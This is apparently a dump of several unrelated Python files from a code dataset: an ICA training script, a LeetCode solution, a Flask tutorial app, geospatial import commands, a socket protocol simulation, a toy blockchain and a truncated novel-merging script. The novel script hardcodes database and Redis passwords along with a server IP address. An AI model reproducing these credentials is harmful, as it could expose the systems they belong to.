labels. \n \n idx = np.arange(0 , len(data[0]))\n np.random.shuffle(idx)\n idx = idx[:num]\n data_shuffle = data[:,idx]\n\n return np.asarray(data_shuffle)\n'''\n\n\n\ndef neural_network_model(data):\n output_layer = {'weights':tf.Variable(tf.random_normal([n_sources, n_sources])),\n 'biases':tf.Variable(tf.random_normal([n_sources]))}\n net = tf.nn.bias_add(tf.matmul(data,output_layer['weights']), output_layer['biases'])\n output = tf.sigmoid(net)\n \n return output, output_layer['weights'],output_layer['biases']\n\ndef calculate_cost(unmixed):\n #slice columns out of a 2d tensor\n Y1 = tf.slice(unmixed,[0,0],[batch_size,1])\n Y2 = tf.slice(unmixed,[0,1],[batch_size,1])\n m1,var1 = tf.nn.moments(Y1,axes=[0])\n m2,var2 = tf.nn.moments(Y2,axes=[0])\n costTotal = 0\n epsilon = 1e-8\n covariate = 0\n #Sums up the cost for all input vectors (2*1) in a batch\n for i in range(batch_size):\n #this accesses the ith element in a 1-d tensor\n y1 = Y1[i,0]\n y2 = Y2[i,0]\n costTotal += tf.log(0.5*(tf.exp(y1)+tf.exp(-y1))+epsilon)+tf.log(0.5*(tf.exp(y2)+tf.exp(-y2))+epsilon) \n covariate += y1*y2\n\n\n cosh = costTotal/batch_size\n covariate = covariate/batch_size\n #cost = -tf.square(cosh)+0.1*tf.abs(var1-1)+0.1*tf.abs(var2-1)+covariate\n cost = -tf.abs(cosh)+0.5*covariate+tf.abs(var1-var)+tf.abs(var2-var)\n return cost,covariate,var1,var2,cosh\n\n\ndef train_neural_network(x):\n information, W, Bias = neural_network_model(x)\n # OLD VERSION:\n #cost = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(prediction,y) )\n # NEW:\n #slice rows out of a 2d tensor\n # Y1 = tf.slice(information,[0,0],[batch_size,1])\n # Y2 = tf.slice(information,[0,1],[batch_size,1])\n # costTotal = 0\n # epsilon = 1e-8\n # #Sums up the cost for all input vectors (2*1) in a batch\n # for i in range(batch_size):\n # #this accesses the ith element in a 1-d tensor\n # y1 = Y1[i,0]\n # y2 = Y2[i,0]\n # #costTotal += -tf.log(tf.abs(tf.matrix_determinant(W+np.identity(2)*epsilon)*y1*(1-y1)*y2*(1-y2)))\n # #mat_deter = tf.matrix_determinant(W+tf.to_float(np.identity(2))*epsilon)\n # mat_deter = tf.matrix_determinant(W)\n # #costTotal += -tf.log(tf.abs(mat_deter)*y1*(1-y1)*y2*(1-y2)+epsilon)+0.01*tf.norm(W, ord='fro', axis=[0,1])\n # costTotal += -tf.log(tf.abs(mat_deter)*y1*(1-y1)*y2*(1-y2)+epsilon)+0.01*tf.norm(W, ord='fro', axis=[0,1])\n\n\n # cost = costTotal/batch_size\n cost,cov,var1,var2,cosh = calculate_cost(information)\n #Add learning rate 1e-5\n optimizer = tf.train.AdamOptimizer(1e-4).minimize(cost)\n #optimizer = tf.train.GradientDescentOptimizer(1e-5).minimize(cost)\n \n hm_epochs = 25\n\n #try to disable all the gpus\n config = tf.ConfigProto(\n device_count = {'GPU': 0}\n )\n\n with tf.Session(config=config) as sess:\n #with tf.Session() as sess:\n\n # run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n # run_metadata = tf.RunMetadata()\n\n sess.run(tf.global_variables_initializer())\n\n #this prints out the training variables in tensorflow\n tvars=tf.trainable_variables()\n myvars = sess.run(tvars)\n print(myvars)\n # sess.close()\n\n # OLD:\n #sess.run(tf.initialize_all_variables())\n # NEW:\n \n for epoch in range(hm_epochs):\n epoch_loss = 0\n step = 0\n for _ in range(int(Ns/batch_size)):\n #epoch_x= next_batch(batch_size,data)\n startIndex = step * batch_size\n # _, c, det = sess.run([optimizer, cost, mat_deter], feed_dict={x: epoch_x}, options=run_options, run_metadata=run_metadata)\n #_, c, det = sess.run([optimizer, cost, mat_deter], feed_dict={x: epoch_x})\n _, c, weights, V1, V2, Cov,Cosh = sess.run([optimizer, cost, W, var1, var2, cov,cosh], feed_dict={x: data[startIndex:startIndex+batch_size,:]})\n epoch_loss += c\n # The following prints the intermediate steps in each epoch\n step+=1\n # if step % 50 ==0:\n # print('Epoch', epoch, 'cost', c,'determinant',det)\n\n epoch_loss = epoch_loss/(int(Ns/batch_size))\n print('Epoch', epoch, 'completed out of',hm_epochs,'loss:',epoch_loss)\n print(weights)\n print(V1)\n print(V2)\n print(Cov)\n print(Cosh)\n\n #Y = sess.run(information, feed_dict={x: data}, options=run_options, run_metadata=run_metadata)\n Y = sess.run(information, feed_dict={x: data})\n\n #without adding back the mean\n sf.write('/home/yanlong/Downloads/2017T1/Comp489/ICA/Data/logcosh1.wav', Y[:,0], fs1)\n sf.write('/home/yanlong/Downloads/2017T1/Comp489/ICA/Data/logcosh2.wav', Y[:,1], fs1)\n \n #windows writing path\n # sf.write('E:\\\\Courses\\\\Comp489\\\\ICA\\\\ICAFast\\\\Data\\\\logcosh1.wav', Y[:,0], fs1)\n # sf.write('E:\\\\Courses\\\\Comp489\\\\ICA\\\\ICAFast\\\\Data\\\\logcosh2.wav', Y[:,1], fs1)\n\n #Create the Timeline object, and write it to a json\n # tl = timeline.Timeline(run_metadata.step_stats)\n # ctf = tl.generate_chrome_trace_format()\n # with open('timeline.json', 'w') as f:\n # f.write(ctf)\n\n\nstart_time = time.clock()\n\n#train_neural_network(x)\ncProfile.run('train_neural_network(x)')\n\nprint(time.clock() - start_time, \"seconds\")\n\n#weight matrix\n# [[ 0.60584104 -0.50052547]\n # [-0.90244889 0.37680322]]\n","sub_path":"Infomax2.py","file_name":"Infomax2.py","file_ext":"py","file_size_in_byte":8699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"478359051","text":"class Solution:\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n new = []\n \n for i in range(len(intervals)):\n if newInterval[1] < intervals[i][0]:\n new.append(newInterval)\n return new + intervals[i:]\n elif newInterval[0] > intervals[i][1]:\n new.append(intervals[i])\n else:\n newInterval = [min(newInterval[0], intervals[i][0]), max(newInterval[1], intervals[i][1])]\n \n new.append(newInterval)\n \n return new","sub_path":"insertInterval.py","file_name":"insertInterval.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"186304309","text":"import numpy as np\n\ndef bivariable_polinomial(coeficients, sample_size=100, x0=0, xmax=100, mu=0, sigma=1):\n\t\"\"\" \n\tReturns x, y numpy arrays in the form of\n\t\n\t[3, 4] --> ax + b --> 3x + 4\n\t[3, 4, 5] --> ax^2 + bx + c --> 3x^2 + 4x + 5\n\n\t\"\"\"\n\n\t# there has to be a better way than to use numbers from 0 to xmax divided by sample size\n\tx = np.linspace(x0, xmax, sample_size, endpoint=True)\n\terror = np.random.normal(mu, sigma, sample_size)\n\n\n\n\t#initialize y as a np array of size=sample_size\n\ty = error\n\t\n\t# here we get the list of coeficients and for each one we will do\n\t# coeficient[i]*x^degree\n\t# since the enumerate function does not go down, we can make degree as coef.len() - i - 1\n\n\tlength = len(coeficients)\n\tfor degree, coef in enumerate(coeficients):\n\t\tif length - degree > 1 :\n\t\t\ty += coef*np.power(x, (length - degree - 1))\n\t\telse:\n\t\t\ty+= coef\n\treturn x, y\t","sub_path":"data_generator/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"196972340","text":"from flask import Flask, redirect, url_for, render_template, session, request, g\nfrom models import *\nfrom exts import db, login_log\n\nimport config\n\napp = Flask(__name__)\napp.config.from_object(config)\ndb.init_app(app)\n\n# db.create_all() 直接用db = SQLAlchemy(app)可以这样使用;db.create_all()目的是通过model来创建表\n# model分离写到其他的地方,就需要手动添加上下文,否则会报错\n# No application found. Either work inside a view function or push an application context.\n# with app.app_context():\n# db.create_all()\n# db.create_all() 只会执行一次,当你修改来model属性时,它不会自动增加相关属性,需要用数据库迁移来实现更新model对应表的字段\n\n\n@app.route('/')\ndef hello_world():\n # print(url_for(\"my_list\"))\n # print(url_for('article', id=\"1234\"))\n # flask_sqlalchemy相关使用\n # 增\n # article1 = Article(title='测试数据', content='测试数据的内容')\n # db.session.add(article1)\n # db.session.commit()\n\n # 查\n # result = Article.query.filter(Article.title == '测试数据').first()\n # print(result.title)\n # print(result.content)\n\n # 改\n # article_result = Article.query.filter(Article.title == '测试数据').first()\n # article_result.title = '修改后的测试数据'\n # db.session.commit()\n\n # 删\n # article_result = Article.query.filter(Article.title == '修改后的测试数据').first()\n # db.session.delete(article_result)\n # db.session.commit()\n\n # 外键设置和使用\n # author = Author(username='周勇利')\n # db.session.add(author)\n # db.session.commit()\n #\n # article_res = Article(title='活着', content='活着才有机会做更多的事情', author_id=1)\n # article_result = Article(title='好好努力', content='世间不会亏待每个有心人', author_id=1)\n # db.session.add(article_res)\n # db.session.add(article_result)\n # db.session.commit()\n\n # 通过article来获取作者\n # article_res = Article.query.filter(Article.title == '活着').first()\n # print(article_res.author.username)\n\n # 通过author 来查找用户所有的文章\n # author_result = Author.query.filter(Author.username == '周勇利').first()\n # articles = author_result.articles\n\n # for art in articles:\n # print('-'*10)\n # print(art.title)\n\n # 多对多关系对象新增\n # tag1 = Tag(name='生活')\n # tag2 = Tag(name='情感')\n #\n # db.session.add(tag1)\n # db.session.add(tag2)\n #\n # article_res = Article.query.filter(Article.title == '活着').first()\n # article_res.tags.append(tag1)\n # article_res.tags.append(tag2)\n #\n # db.session.commit()\n\n # 多对多关系查找\n if hasattr(g, 'username'):\n article_result = Article.query.filter(Article.title == '活着').first()\n tags = article_result.tags\n for t in tags:\n print('*' * 10)\n print(t.name)\n # session 设置,flask框架的session是经过加密后返回给浏览器保存在cookie中\n # session['tag'] = '生活和情感'\n return 'hello world!'\n else:\n return redirect(url_for('login'))\n\n\n@app.route('/get/')\ndef get():\n # session 获取\n tag = session.get('tag')\n print(tag)\n # session 删除\n if tag:\n print('key->tag存在')\n session.pop('tag')\n else:\n print('key->tag不存在')\n\n print(session.get('tag'))\n return 'success'\n\n\n@app.route('/article/')\ndef article(id):\n return u'你传入的参数是:%s' % id\n\n\n@app.route('/list/')\ndef my_list():\n return\n\n\n@app.route('/question/')\ndef question(is_login):\n if is_login == '1':\n return u'这是发布问答页面'\n else:\n return redirect(url_for('login'))\n\n\n# methods 参数设置post和get访问类型 ,默认只支持get访问\n# get 可以使用request.args.get('')获取参数\n# post 可以使用request.form.get('')获取参数\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n\n if request.method == 'GET':\n q = request.args.get('q')\n print('get的请求参数:', q)\n return render_template('login.html')\n else:\n username = request.form.get('username')\n password = request.form.get('password')\n\n if username == '123456' and password == '123456':\n # # g 是flask框架的全局变量,在一次请求中全局有效,请求结束后g就会失效\n # g.username = username\n # g.password = password\n # # 使用来全局变量g的方法,必须在同一次调用中使用,调用完成就回被释放掉\n # login_log()\n\n # 用来验证钩子函数 before_request\n session['username'] = username\n return redirect(url_for('hello_world'))\n else:\n return u'用户名密码错误'\n\n\n@app.route('/index/')\ndef index():\n class Person(object):\n name = u'周勇利'\n age = 29\n\n p = Person()\n\n context = {\n 'username': u'周勇利',\n 'sex': u'男',\n 'age': 29,\n 'person': p,\n 'websites': {\n 'baidu': 'www.baidu.com',\n 'google': 'www.google.com'\n }\n }\n return render_template('index.html', **context)\n\n\n@app.route('/answer/')\ndef answer(id):\n user = {\n 'name': u'周勇利',\n 'age': 29\n }\n if id == '1':\n return render_template('answer.html', user=user)\n else:\n return render_template('answer.html')\n\n\n@app.route('/for/')\ndef my_for():\n user = {\n 'username': u'周勇利',\n 'age': 29\n }\n\n websites = ['www.baidu.com', 'www.google.com']\n\n books = [\n {\n 'name': '西游记',\n 'author': '吴承恩',\n 'price': 120\n },\n {\n 'name': '红楼梦',\n 'author': '曹雪芹',\n 'price': 123\n },\n {\n 'name': '三国演义',\n 'author': '罗贯中',\n 'price': 124\n },\n {\n 'name': '水浒传',\n 'author': '施耐庵',\n 'price': 125\n }\n ]\n\n avatar = ''\n\n contents = [\n {\n 'name': '周勇利',\n 'text': '评论内容'\n },\n {\n 'name': '周劭洋',\n 'text': '评论内容2'\n }\n ]\n\n return render_template('for.html', user=user, websites=websites, books=books, contents=contents)\n\n\n@app.route('/extend_block/')\ndef extend_block():\n return render_template('extendblock.html')\n\n\n@app.before_request\ndef my_before_request():\n # 在所有的视图函数之前执行\n # 可以做一些登陆之前的验证,判断用户是否已经登陆,不能在钩子函数中直接使用redirect,会导致重复的重定向\n username = session.get('username')\n if username:\n g.username = username\n\n\n@app.context_processor\ndef my_context_processor():\n # 上下文处理程序,可以设置字典,字典的key值会被模版当作变量来处理,\n # 作用是多个模版有共同的变量时可以在上下文处理程序中设置\n return {'username': '周勇利'}\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"194218717","text":"\"\"\"Landshark importing commands.\"\"\"\n\nimport logging\nimport os.path\nfrom glob import glob\nfrom multiprocessing import cpu_count\n\nimport tables\nimport click\nfrom typing import List, Optional\n\nfrom landshark.tifread import shared_image_spec, OrdinalStackSource, \\\n CategoricalStackSource\nfrom landshark.featurewrite import write_imagespec, write_ordinal, \\\n write_categorical, write_coordinates\nfrom landshark.shpread import OrdinalShpArraySource, \\\n CategoricalShpArraySource, CoordinateShpArraySource\nfrom landshark.scripts.logger import configure_logging\nfrom landshark.hread import read_image_spec, \\\n CategoricalH5ArraySource, OrdinalH5ArraySource\nfrom landshark.trainingdata import write_trainingdata, write_querydata\nfrom landshark.metadata import from_files, write_metadata\nfrom landshark.normalise import get_stats\nfrom landshark.category import get_maps\nfrom landshark.trainingdata import setup_training\n\nlog = logging.getLogger(__name__)\n\n\n# SOME USEFUL PREPROCESSING COMMANDS\n# ----------------------------------\n# gdal_translate -co \"COMPRESS=NONE\" src dest\n\n\n@click.group()\n@click.option(\"-v\", \"--verbosity\",\n type=click.Choice([\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\"]),\n default=\"INFO\", help=\"Level of logging\")\ndef cli(verbosity: str) -> int:\n \"\"\"Parse the command line arguments.\"\"\"\n configure_logging(verbosity)\n return 0\n\n\ndef _tifnames(directories: Optional[str]) -> List[str]:\n names: List[str] = []\n if directories is None:\n return names\n for d in directories:\n file_types = (\"tif\", \"gtif\")\n for t in file_types:\n glob_pattern = os.path.join(d, \"**\", \"*.{}\".format(t))\n names.extend(glob(glob_pattern, recursive=True))\n return names\n\n\n@cli.command()\n@click.option(\"--batchsize\", type=int, default=100)\n@click.option(\"--categorical\", type=click.Path(exists=True), multiple=True)\n@click.option(\"--ordinal\", type=click.Path(exists=True), multiple=True)\n@click.option(\"--nonormalise\", is_flag=True)\n@click.option(\"--name\", type=str, required=True,\n help=\"Name of output file\")\n@click.option(\"--nworkers\", type=int, default=cpu_count())\n@click.option(\"--ignore-crs/--no-ignore-crs\", is_flag=True, default=False)\ndef tifs(categorical: str, ordinal: str, nonormalise: bool,\n name: str, nworkers: int, batchsize: int, ignore_crs: bool) -> int:\n \"\"\"Build a tif stack from a set of input files.\"\"\"\n normalise = not nonormalise\n log.info(\"Using {} worker processes\".format(nworkers))\n out_filename = os.path.join(os.getcwd(), name + \"_features.hdf5\")\n ord_filenames = _tifnames(ordinal) if ordinal else []\n cat_filenames = _tifnames(categorical) if categorical else []\n all_filenames = ord_filenames + cat_filenames\n spec = shared_image_spec(all_filenames, ignore_crs)\n\n with tables.open_file(out_filename, mode=\"w\", title=name) as outfile:\n write_imagespec(spec, outfile)\n\n if ordinal:\n ord_source = OrdinalStackSource(spec, ord_filenames)\n log.info(\"Ordinal missing value is {}\".format(ord_source.missing))\n if normalise:\n stats = get_stats(ord_source, batchsize)\n zvar = stats[1] == 0.0\n if any(zvar):\n zsrcs = [c for z, c in zip(zvar, ord_source.columns) if z]\n msg = 'The following sources have zero variance: {}'\n raise ValueError(msg.format(zsrcs))\n else:\n stats = None\n\n log.info(\"Writing normalised ordinal data to output file\")\n write_ordinal(ord_source, outfile, nworkers, batchsize, stats)\n\n if categorical:\n cat_source = CategoricalStackSource(spec, cat_filenames)\n log.info(\"Categorical missing value is {}\".format(\n cat_source.missing))\n maps = get_maps(cat_source, batchsize)\n log.info(\"Writing mapped categorical data to output file\")\n write_categorical(cat_source, outfile, nworkers, batchsize, maps)\n\n log.info(\"GTiff import complete\")\n\n return 0\n\n\n@cli.command()\n@click.argument(\"targets\", type=str, nargs=-1)\n@click.option(\"--shapefile\", type=click.Path(exists=True), required=True)\n@click.option(\"--batchsize\", type=int, default=100)\n@click.option(\"--name\", type=str, required=True)\n@click.option(\"--every\", type=int, default=1)\n@click.option(\"--categorical\", is_flag=True)\n@click.option(\"--normalise\", is_flag=True)\n@click.option(\"--random_seed\", type=int, default=666)\ndef targets(shapefile: str, batchsize: int, targets: List[str], name: str,\n every: int, categorical: bool, normalise: bool, random_seed: int) \\\n -> int:\n \"\"\"Build target file from shapefile.\"\"\"\n log.info(\"Loading shapefile targets\")\n out_filename = os.path.join(os.getcwd(), name + \"_targets.hdf5\")\n nworkers = 0 # shapefile reading breaks with concurrency\n\n with tables.open_file(out_filename, mode=\"w\", title=name) as h5file:\n coord_src = CoordinateShpArraySource(shapefile, random_seed)\n write_coordinates(coord_src, h5file, batchsize)\n\n if categorical:\n cat_source = CategoricalShpArraySource(\n shapefile, targets, random_seed)\n maps = get_maps(cat_source, batchsize)\n write_categorical(cat_source, h5file, nworkers, batchsize, maps)\n else:\n ord_source = OrdinalShpArraySource(shapefile, targets, random_seed)\n stats = get_stats(ord_source, batchsize) \\\n if normalise else None\n write_ordinal(ord_source, h5file, nworkers, batchsize, stats)\n\n log.info(\"Target import complete\")\n\n return 0\n\n\n@cli.command()\n@click.argument(\"features\", type=click.Path(exists=True))\n@click.argument(\"targets\", type=click.Path(exists=True))\n@click.option(\"--folds\", type=click.IntRange(2, None), default=10)\n@click.option(\"--testfold\", type=click.IntRange(1, None), default=1)\n@click.option(\"--halfwidth\", type=click.IntRange(0, None), default=1)\n@click.option(\"--nworkers\", type=click.IntRange(0, None), default=cpu_count())\n@click.option(\"--batchsize\", type=click.IntRange(1, None), default=100)\n@click.option(\"--random_seed\", type=int, default=666)\ndef trainingdata(features: str, targets: str, testfold: int,\n folds: int, halfwidth: int, batchsize: int, nworkers: int,\n random_seed: int) -> int:\n \"\"\"Get training data.\"\"\"\n\n tinfo = setup_training(features, targets, folds, random_seed, halfwidth)\n n_train = len(tinfo.target_src) - tinfo.folds.counts[testfold]\n directory = os.path.join(os.getcwd(), tinfo.name +\n \"_traintest{}of{}\".format(testfold, folds))\n metadata = from_files(features, targets, tinfo.image_spec,\n halfwidth, n_train, folds, testfold)\n write_trainingdata(tinfo, directory, testfold, batchsize, nworkers)\n write_metadata(directory, metadata)\n log.info(\"Training import complete\")\n return 0\n\n\n@cli.command()\n@click.option(\"--features\", type=click.Path(exists=True), required=True)\n@click.option(\"--batchsize\", type=int, default=1)\n@click.option(\"--nworkers\", type=int, default=cpu_count())\n@click.option(\"--halfwidth\", type=int, default=1)\n@click.argument(\"strip\", type=int)\n@click.argument(\"totalstrips\", type=int)\ndef querydata(features: str, batchsize: int, nworkers: int,\n halfwidth: int, strip: int, totalstrips: int) -> int:\n \"\"\"Grab a chunk for prediction.\"\"\"\n log.info(\"Using {} worker processes\".format(nworkers))\n\n dirname = os.path.basename(features).rsplit(\".\")[0] + \\\n \"_query{}of{}\".format(strip, totalstrips)\n directory = os.path.join(os.getcwd(), dirname)\n try:\n os.makedirs(directory)\n except FileExistsError:\n pass\n\n image_spec = read_image_spec(features)\n tag = \"query.{}of{}\".format(strip, totalstrips)\n write_querydata(features, image_spec, strip, totalstrips,\n batchsize, halfwidth, nworkers, directory, tag)\n log.info(\"Query import complete\")\n return 0\n","sub_path":"landshark/scripts/importers.py","file_name":"importers.py","file_ext":"py","file_size_in_byte":8073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"525669662","text":"# 服务端\nimport random\nfrom socket import *\nimport time\n\nACK_0 = '0'\nACK_1 = '1'\nNAK = '-1'\nTIMEOUT_1 = '2' # 确认帧未及时返回\nTIMEOUT_2 = '3' # 数据帧丢失\n\n\ndef receive(conn, addr):\n NowFlag = -1\n BeforeFlag = -1\n ReceiveMessageList = []\n CanAddFlag = True # 一次发送多次重复帧能否添加\n while True:\n index = random.sample(range(0, 4), 1)\n try:\n data = conn.recv(BUFSIZ) # 读取已链接客户的发送的消息\n time.sleep(0.1)\n except Exception:\n print(\"断开的客户端\", addr)\n break\n receiveStr = data.decode(COD)\n if not receiveStr:\n break\n NowFlag = int(receiveStr[0])\n messege = receiveStr[2:]\n if index[0] == 0: # 确认帧未及时返回\n print(\"(ReceivedMessage:%s,Order:%d),确认帧未及时返回\" % (messege, NowFlag))\n BeforeFlag = NowFlag\n if CanAddFlag:\n ReceiveMessageList.append(messege)\n CanAddFlag = False\n time.sleep(0.2000001)\n elif index[0] == 1: # 数据帧丢失\n print(\"数据帧丢失\")\n time.sleep(0.2000001)\n elif index[0] == 2:\n print(\"接收到错误帧\")\n conn.send(NAK.encode(COD)) # 错误\n else: # 正确接收\n CanAddFlag = True\n if BeforeFlag == NowFlag:\n print(\"(ReceivedMessage:%s,Order:%d),重复帧\" % (messege, NowFlag))\n else:\n BeforeFlag = NowFlag\n ReceiveMessageList.append(messege)\n print(\"(ReceivedMessage:%s,Order:%d),正确接收\" % (messege, NowFlag))\n if len(ReceiveMessageList) != 0:\n for value in ReceiveMessageList:\n print(value, end=\" \")\n print()\n if NowFlag == 0:\n conn.send(ACK_1.encode(COD)) # 0号帧收到,想收1号帧\n else:\n conn.send(ACK_0.encode(COD)) # 1号帧收到,想收0号帧\n conn.close() # 关闭客户端链接\n\n\nif __name__ == '__main__':\n COD = 'utf-8'\n HOST = '' # 主机ip\n PORT = 21566 # 软件端口号\n BUFSIZ = 1024\n ADDR = (HOST, PORT)\n SIZE = 10\n tcpS = socket(AF_INET, SOCK_STREAM) # 创建socket对象\n tcpS.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # 加入socket配置,重用ip和端口\n tcpS.bind(ADDR) # 绑定ip端口号\n tcpS.listen(SIZE) # 设置最大链接数\n while True:\n # if len(ReceiveMessageList)!=0:\n # for value in ReceiveMessageList:\n # print(value,end=\"\")\n # print()\n print(\"服务器启动,监听客户端链接\")\n conn, addr = tcpS.accept()\n print(\"链接的客户端\", addr)\n receive(conn, addr)\n tcpS.closel()\n","sub_path":"test2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"44655067","text":"import hashlib as hasher\nimport datetime as date\n\n# Source: https://gist.github.com/aunyks/8f2c2fd51cc17f342737917e1c2582e2\n\n# Define what a Snakecoin block is\nclass Block:\n def __init__(self, index, timestamp, data, previous_hash):\n self.index = index\n self.timestamp = timestamp\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.hash_block()\n \n def hash_block(self):\n sha = hasher.sha256()\n sha.update(str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash))\n return sha.hexdigest()\n\n# Generate genesis block\ndef create_genesis_block():\n # Manually construct a block with\n # index zero and arbitrary previous hash\n return Block(0, date.datetime.now(), \"Genesis Block\", \"0\")\n\n# Generate all later blocks in the blockchain\ndef next_block(last_block, cat_image_pixels_data):\n this_index = last_block.index + 1\n this_timestamp = date.datetime.now()\n this_data = cat_image_pixels_data\n this_hash = last_block.hash\n return Block(this_index, this_timestamp, this_data, this_hash)","sub_path":"snakecoin.py","file_name":"snakecoin.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"160057807","text":"from flask import render_template, jsonify, flash, redirect, url_for\nfrom flask_login import login_required, current_user\n\nfrom app import app\nfrom app.plugins.general_helper import user_accept_onboarding\n\n\n@app.route('/', methods=['GET'])\n@login_required\ndef index():\n return render_template('home.html')\n\n\n@app.route('/check-welcome', methods=['POST'])\n@login_required\ndef check_welcome(jsonified=True):\n persona = current_user.to_dict()['data']\n if persona['accepted_onboarding']:\n incomplete = False\n else:\n incomplete = True\n outstanding = sum([step['open'] for step in persona['startup_steps']])\n data = {\n 'html': render_template('welcome.html', persona=persona,\n outstanding=outstanding),\n 'incomplete': incomplete,\n 'outstanding': outstanding\n }\n if jsonified:\n return jsonify(data)\n else:\n return data\n\n\n@app.route('//accept-onboarding', methods=['GET'])\n@login_required\ndef accept_onboarding(user_id):\n if current_user.id == user_id and not check_welcome(jsonified=False)['outstanding']:\n user_accept_onboarding(current_user)\n flash(\"You're all set!\")\n return redirect(url_for('index'))\n","sub_path":"app/ui/application_routes.py","file_name":"application_routes.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"633764984","text":"# encoding=utf-8\n# @Author :Alan\n# @Time : 2019/12/4 10:30\n# @File : readconfig.PY\nimport xlrd\n\nclass readexcel(object):\n\tdef __init__(self,file_name):\n\t\t#self.file_name=file_name\n\t\tself.xl = xlrd.open_workbook(file_name)\n\tdef read(self):\n\t\tself.table = self.xl.sheet_by_name('login')\n\t\tself.row = self.table.row_values(1)\n\t\tfor i in range(len(self.row)):\n\t\t\tif isinstance(self.row[i],float):\n\t\t\t\tself.row[i]=str(int(self.row[i]))\n\t\treturn self.row\n\nif __name__==\"__main__\":\n\texcel = readexcel('config.xlsx')\n\texcel.read()","sub_path":"readconfig.py","file_name":"readconfig.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"594435609","text":"\"\"\"\n 合并小说的内容\n\"\"\"\nimport pymysql.cursors\nimport redis\nimport hashlib\nimport shutil\nimport os\nimport json\nimport time\nimport difflib\nimport sys\n\n\n# DB_HOST = '127.0.0.1'\n# DB_USER = 'novelcode'\n# DB_PWD = 'RvZ@7^yGR2waQNLJ'\n# DB_NAME = 'novel_collect'\n# DB_CHARSET = 'utf8'\n# DB_PORT = 3306\n#\n#\n# redis_config = {\n# \"host\": \"221.195.1.100\",\n# \"port\": 26890,\n# \"db\": 4,\n# \"password\": 'plOTrEdLUnFGYJzo',\n# }\n\n\nDB_HOST = '127.0.0.1'\nDB_USER = 'root'\nDB_PWD = 'root'\nDB_NAME = 'novel_collect'\nDB_CHARSET = 'utf8'\nDB_PORT = 3306\n# redis\n\nredis_config = {\n \"host\": \"127.0.0.1\",\n \"port\": 6379,\n \"db\": 4,\n \"password\": '',\n}\n\n\n\nFILE_BASE = \"/data1/book/\"\n\nclass novelMarge(object):\n\n def __init__(self):\n self.mysql = pymysql.Connect(\n host = DB_HOST,\n user = DB_USER,\n passwd= DB_PWD,\n port = DB_PORT,\n db = DB_NAME,\n charset=DB_CHARSET\n )\n\n self.redis_pool = redis.ConnectionPool(**redis_config)\n self.sredis = redis.Redis(connection_pool=self.redis_pool)\n def main(self):\n # 第四步 把多个章节内容合并成list.json 格式\n self.get_update_novel_gather()\n\n\n #第三步 合并出新的书籍 创建新书籍\n #self.add_new_novels()\n # 第二部要合并数据缓存\n #self.get_novel_neaten()\n # 第一步 项目执行次数\n #self.novel_neaten()\n\n \"\"\"\n 获取所有的来源 地址数据 进行书籍匹配和合并 匹配到 90 以上\n \"\"\"\n def get_update_novel_gather(self):\n lists=[]\n adbb = {}\n adbb['name'] = 1\n adbb['sex'] = 2\n\n lists.append(adbb)\n cc = {}\n cc['name'] = 2\n cc['sex'] = 4\n cc['wixiaowen'] = 4\n\n lists.append(cc)\n print(lists)\n exit()\n # if self.sredis.get(\"update_novel\"):\n # print(\"程序在进行中。请等待。。。\")\n # exit()\n # else:\n # self.sredis.set(\"update_novel\", 1)\n lg = 0\n page_index = 0\n limit = 100\n cursor = self.mysql.cursor()\n #try:\n while lg == 0:\n page = page_index * limit\n sql = \"select * from novel_novels_gather where new_novels_id>0 order by weight desc limit %d,%d\" % (page, limit)\n cursor.execute(sql)\n novels_list = cursor.fetchall()\n lencut = len(novels_list)\n page_index += 1\n\n if lencut == 0:\n lg = 1\n cursor.close()\n print(\"全部更新完成\")\n exit()\n else:\n\n if novels_list:\n for index,valss in enumerate(novels_list):\n #获取的所有的相关的章节的最近更新的数量\n novel_chapters_sql = \"select novels_id,count from novel_chapters where novels_id IN(%s)\" %(valss[4])\n cursor.execute(novel_chapters_sql)\n novel_chapters = cursor.fetchall()\n novel_chapters_list = {}\n for vals in novel_chapters:\n novel_chapters_list[vals[0]] = vals[1]\n\n #在获取的当前更新的长度\n novel_novels_neaten_sql = \"select novels_id,source_id,count from novel_novels_neaten where novels_id IN(%s)\" %(valss[4])\n cursor.execute(novel_novels_neaten_sql)\n novel_novels_neaten = cursor.fetchall()\n\n # 获取的合并的书籍所有的章节内容\n newsPath = \"%s%s/%s/chapter.json\" % (FILE_BASE, 35, valss[1])\n\n #合并的小说的书籍ID\n mage_novel_id = valss[1]\n with open(newsPath,'r') as f:\n mage_chapters_list = f.read()\n mage_chapters_list = json.loads(mage_chapters_list)\n #合并最新书籍章节数量\n mage_chapters_number = len(mage_chapters_list)\n novel_chapters_info = {}\n for index,neaten_vl in enumerate(novel_novels_neaten):\n novel_chapters_info[neaten_vl[0]] = neaten_vl[1]\n\n #来源 数据优先处理\n update_chapters_number = 